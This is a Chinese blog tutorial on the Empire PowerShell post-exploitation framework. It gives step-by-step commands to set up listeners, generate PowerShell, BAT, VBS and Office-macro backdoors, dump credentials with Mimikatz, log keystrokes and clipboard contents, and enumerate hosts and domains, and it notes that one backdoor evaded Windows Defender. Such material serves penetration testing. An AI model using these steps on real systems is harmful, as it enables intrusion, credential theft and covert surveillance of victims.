Empire

最新推荐文章于 2022-12-25 18:49:32 发布
最新推荐文章于 2022-12-25 18:49:32 发布
阅读量279 收藏 1
点赞数
分类专栏: 内网后渗透 文章标签: 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jietewang/article/details/120905450
版权

目录

0x01 前言

0x02 安装

0x03 Empire使用教程

0x04 使用Empire进行信息收集

0x01 前言

Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够适应通信躲避网络检测,所有的这些功能都封装在一个以实用性为重点的框架中

安装建议

虽然现在该项目在GitHub上已经停止维护了,python2.7也已经停止更新了,该工具还是能够使用的,只是安装起来异常麻烦,要一个模块一个模块的安装,而且最好是安装在老版本的Kali上,最新版的Kali虽然看起来花里胡哨的,但是有很多工具因为编译环境的问题,花在解决问题上的时间就不少,极易影响安装进度。本文就是在搞了半天的环境后果断选用Kali2019成功安装。

0x02 安装

Empire下载地址:https://github.com/EmpireProject/Empire.git(因为安装这玩意儿还把Kali的代理软件搞坏了,直接访问该链接下载了复制上去即可),百度的方法大多都是git clone,但是国内的网......

unzip Empire-master.zip

cd  Empire-master

cd setup/

./install.sh

最后输入数据库密码,直接回车默认即可

 在安装的过程中会报大量的[ImportError: No module named xlutils.copy]类似这样的问题,而且现在很多模块名早已物是人非了,名字要么简化了,要么直接没了,直接使用pip install moudlename安装接口,如果失败就只有手动安装了。

百度对应的模块名,到官网下载后解压,使用python2 setup.py install安装即可。

虽然麻烦一点但相信你迟早会安装完成的,进入Empire安装目录执行./empire启动。

0x03 Empire使用教程

Empire的使用和MSF类似,建立一个Listeners,然后生成 木 马,在目标主机上执行,在Listeners上就会接收到目标主机返回的会话。现在个人感觉使用这个的应该不多了,大多数还是CS或者MSF。

输入help查看命令帮助。

1.Listeners建立监听

使用查看帮助命令uselistener是使用Empire的监听模块,能使用的有9个监听模块。

使用http模块,需要键入uselistener http, 然后在使用info查看该监听器需要配置的参数。

 根据Name字段配置需要的参数,只需要配置Name、Host、Port即可。

set Name jietewang  # 设置监听名字

set Host http://192.168.163.118:3333  # 设置主机ip(Empire安装的主机IP)

set Port 3333 # 设置端口

execute # 执行

back # 返回上一层

list # 查看当前激活的监听列表

kill name # 删除该监听

2.生成后门

通过设置监听接受反弹的shellusestager该命令设置生成木马的模块,multi为通用模块,osxMacOS的模块,Windows既是WindowsOS的模块。

 Powershell反弹命令

如果需要生成利用Powershell反弹shell的命令,在设置完监听以后,输入launchher powershell  listenerName来生成powershell代码。

将生成的payload到目标主机执行,即可获得session,此时便会在攻击机上看到Empire已上线了一个名为B3ZHSVPG的主机了。

使用agents命令可以查看已经存在的会话

接收到会话后的常用命令

interact  # 连接主机

remove # 删除失效主机

shell command # 执行cmd命令时需要

help agentcmds # 常看经常使用的命令

获取目标主机屏幕截图使用命令sc

2.DLL木马

使用命令:usestager windows/dll

查看配置参数:info

设置监听器:set Listener jietewang

执行:execute

关于DLL木马使用了很多方法均失败了,先放弃吧。也没有搜到详细的介绍文章,有一个大兄弟给了一个运行DLL文件的方法,执行成功了但是没有上线。

如何运行dll文件_龙傲天的博客-CSDN博客_.dll文件怎么执行直接拷贝该文件到系统目录里:   1、Windows 95/98/Me系统,将dao360.dll复制到C:\Windows\System目录下。   2、Windows NT/2000系统,将dao360.dll复制到C:\WINNT\System32目录下。   3、Windows XP/WIN7/Vista系统,将dao360.dll复制到C:\Windows\System32目https://blog.csdn.net/oYuHuaChen/article/details/54612998直接拷贝该文件到系统目录里:
   1、Windows 95/98/Me系统,将dao360.dll复制到C:\Windows\System目录下。
   2、Windows NT/2000系统,将dao360.dll复制到C:\WINNT\System32目录下。
   3、Windows XP/WIN7/Vista系统,将dao360.dll复制到C:\Windows\System32目录下。
        4、如果您的系统是64位的请将文件复制到C:\Windows\SysWOW64目录
 开始-运行-输入regsvr32 dao360.dll

3.生成VBS脚本后门

使用命令:usestager windows/launcher_vbs

查看配置参数:info

设置监听器:set Listener jietewang

执行:execute

生成的后门会在目录/tmp/下,将其上传到目标主机执行即可上线。

4.生成bat脚本后门

使用命令:usestager windows/launcher_bat

查看配置参数:info

设置监听器:set Listener jietewang

执行:execute

生成的后门会在目录/tmp/下,将其上传到目标主机执行即可上线。bat文件生成后物理机上的Windows Defender是并未报毒查杀的,这算是直接免杀了吗?之前生成的后门是无一幸免被其报毒查杀要一一加白才行。 

 5.Macro 木马

使用命令:usestager windows/macro

查看配置参数:info

设置监听器:set Listener jietewang

执行:execute

使用宏木马时,需要将生成的代码添加到Office文件中,才能完成上线,当用户触发word文件时Empire会接收到会话。如何添加到word中请参考文章【3.3.2 MS Office Macro】:CobaltStrike 4.1中文版的安装使用_Jietewang的博客-CSDN博客_cobaltstrike汉化1. CobaltStrike简介CobaltStrike是一款后渗透神器,有个故事是这么说的自从用了CobaltStrike神器后,妈妈再也不用担心我搞渗透了。专业人士亲切的称它为CS,于其说它是一个工具不如说它是一个集成的平台...https://blog.csdn.net/Jietewang/article/details/111033558

 6.其他操作

使用mimikatz抓取主机密码

creds # 自动过滤和整理用户密码

creds export /root/pass.csv # 将密码保存到本地

 

0x04 使用Empire进行信息收集

利用Empire除了可以进行上文提到的常规命令执行信息收集和屏幕截图意外,该工具还提供了很多模块用于信息收集,使我们能从更加专业和便捷的角度收集内网与主机相关的更多信息。

1.键盘记录

使用模块:usemodule powershell/collection/keylogger

设置agent对象:set Agent WRPXH9A3

执行:execute

键盘记录结果保存在目录 Empire/downloads/agent名/keystrokes.txt,但是不会记录中文、空格,删除的内容都是可以记录的,如果要持续进行键盘记录,可以把当前监控模块置于后台,输入jobs即可显示当前在后台的记录,如果要停止记录,可以使用jobs kill JOB_name命令。

2.剪贴板记录

使用模块:usemodule powershell/collection/clipboard_monitor

设置agent对象:set Agent WRPXH9A3

执行:execute

3.查找共享

使用模块:usemodule situational_awareness/network/powerview/share_finder
执行:execute

 

4.目标主机信息收集

(Empire: W36U52LP) > usemodule situational_awareness/host/winenum
(Empire: powershell/situational_awareness/host/winenum) > execute

该模块能收集到主机的很多信息,包含主机名、活动目录组成员、最后5个被打开的文件、“有趣的文件”、系统信息、安装的软件、进程、可用的共享、网卡信息、防火墙规则等等。因为内容较多流量狠大,个人感觉不是很安全。

usemodule situational_awareness/host/computerdetails* 

可以使用上述模块收集主机日志信息

5.arp扫描

(Empire: W36U52LP) > usemodule situational_awareness/network/arpscan

(Empire: powershell/situational_awareness/network/arpscan) > set Range 192.168.163.0-192.168.163.254
(Empire: powershell/situational_awareness/network/arpscan) > execute

6.其他域相关

usemodule situational_awareness/network/powerview/user_hunter
usemodule situational_awareness/network/powerview/find_localadmin_access # 本地管理组

usemodule situational_awareness/network/powerview/get_domain_controller # 获取域控
usemodule situational_awareness/network/reverse_dns # DNS信息获取

usemodule situational_awareness/host/dnsserver # 查询当前DNS服务器

Jietewang
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
empire框架2022最新版本
06-28
Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。 Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在...
ModuleNotFoundError: No module named 'xlutils'
吃了亏还皮
04-22 1万+
运行python代码时,出现以下错误 缺少xlutils库,运行: pip install xlutils 运行结束如下,然后就可以正常运行相关代码了
各位大哥,python练习copy excel出现bug,小白求指导
qq_41855942的博客
03-30 908
python练习copy excel出现bug,求指导 interpreter中已经安装了xlutils,为什么还有这样的报错呢 代码: import xlutils from xlrd import open_workbook workbook=open_workbook(r’D:\test\xlwt_test.xls’) sheet1=workbook.sheet_by_index(0) ce...
自定义module时 出现报错ImportError: No module named utils 解决方法!
cangqiongxiaoye的博客
12-25 2197
自定义module时 出现报错ImportError: No module named utils 解决方法!
帝国Empire
MGwhhyq的博客
05-19 595
Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测和大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。 Empire运行在linux平台上
ModuleNotFoundError: No module named‘‘xlrd ‘ 或 xlutils‘ 的解决办法
weixin_44898291的博客
10-12 2682
问题描述 windows10下,python代码中引用头文件 import xlrd 出现下面错误, "No module named ‘xlrd’ 原因 python的xlrd库是第三方的,需要另外自行安装。 解决方案 进入windows command 命令行,然后把目录切换到python的安装目录下的Script文件夹,运行 easy_inatall pip, 安装pip命令 ![!](https://img-blog.csdnimg.cn/20201012160639948.png?.
empire-web:PowerShell Empire Web界面
05-14
运行Empire REST API服务器获取PowerShell Empire: : ./empire --rest --restport <port> --username <empire> --password <empire> 例如: ./empire --rest --restport 1337 --username admin --password 3mpir3...
Empire学习笔记.pdf
09-25
配合上一篇Empire知识点梳理食用更佳喔
Empire-开源
04-26
《帝国》是一款基于两人游戏的战略游戏,具有简单的规则,其目的是通过用我们自己的敌人包围来捕获敌人。 当前,它支持两个人类玩家之间的网络游戏。
FDTD软件Empire设计UWB天线(免费)-综合文档
05-25
an_empire-uwb2News Release UWB ……
Empire基础使用
yyj1781572的博客
11-12 971
Empire基础使用
Empire(一)基础使用
qq_56426046的博客
09-12 1142
后渗透框架 这个框架渗透内网渗透,主要针对windows内网渗透,这个框架集合了很多powershell内网渗透脚本,它支持域内网渗透,宏钓鱼,内网横行扩展,权限维持,后门生成等。
JupyterLab中报错:ModuleNotFoundError: No module named 'xlutils'
qq_30343275的博客
12-05 1831
JupyterLab中报错:ModuleNotFoundError: No module named ‘xlutils’ 解决办法: 在jupyterLab代码前,增加一句 !pip install xlutils,即可
在服务器上读取pickle文件报错ImportError: No module named copy_reg
RichardoMu的博客
04-05 1575
在服务器上python2环境中读取pickle文件,报错ImportError: No module named copy_reg。这是因为Windows和Linux的pickle文件的存储格式不同。在windows中新行的符号存储成"\r\n",而在Linux中,新行的符号存储成"\n",因此,当在Linux上读取pickle文件出错时,应该朱行读取pickle文件,将其中的"\r\n"替换成"...
python模块以及导入出现ImportError: No module named 'xxx'问题
热门推荐
我的新博客
02-23 57万+
python中,每个py文件被称之为模块,每个具有__init__.py文件的目录被称为包。只要模 块或者包所在的目录在sys.path中,就可以使用import 模块或import 包来使用 如果你要使用的模块(py文件)和当前模块在同一目录,只要import相应的文件名就好,比 如在a.py中使用b.py:  import b  但是如果要import一个不同目录的文件(例如b.
ImportError: No module named 通用解决方法
技术博客
05-17 21万+
最近多个小伙伴儿问“ImportError: No module named xxx“,应该怎么样解决。其实,问这个问题,还是因为你对python的基本方法没有掌握好,我也把这类问题的通用解决方法整理一下,希望对小伙伴儿们能够有帮助。报错现象:ImportError: No module named xxx(例如:ImportError: No module named pexpect)问题原因:...
python导入模块出现ImportError: No module named '...'问题解决方法总结
weixin_40995629的博客
04-24 3万+
问题描述:在导入自己写的模块的时候,有时候会出现问题:ImportError: No module named 'xxx',前人已经总结的方法如下:(1) 使用sys.path.append来添加路径, 具体如下:import syssys.path.append("/path/your/code")(2)使用PYTHONPATH环境变量(3)将py文件放到site-packages目录下(4)使...
Python简单读写Excel (xlwt, xlrd, xlutils)
dietan8353的博客
01-12 146
#!/usr/bin/env python #coding=utf8 #################################################################################### # #此程序是为了将excel中的一列单元格的中的某些数字不够三位的补零,如cell: abc_12_cd -> abc_012_cd #涉...
Python:Python中已安装的模块出现No module named 'xxx'的解决方案之一
Chnyac的博客
05-13 2万+
问题:在 x:\Python36\Lib\site-packages\XXX 中的文件出现 No module named 'xxx',          而 xxx.py 文件存在于 XXX 目录中,但仍出现No module named 'xxx'。解决:可能在 import xxx 中需要使用 import XXX.xxx 来替换。...
通过list<Empire*>::iterator访问Empire的成员
最新发布
06-11
可以通过迭代器(*iterator)来访问Empire的成员,然后使用成员访问运算符(.)或箭头运算符(->)来访问Empire的成员变量或成员函数。 以下是一个示例代码: ```c++ #include #include using namespace std; class ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值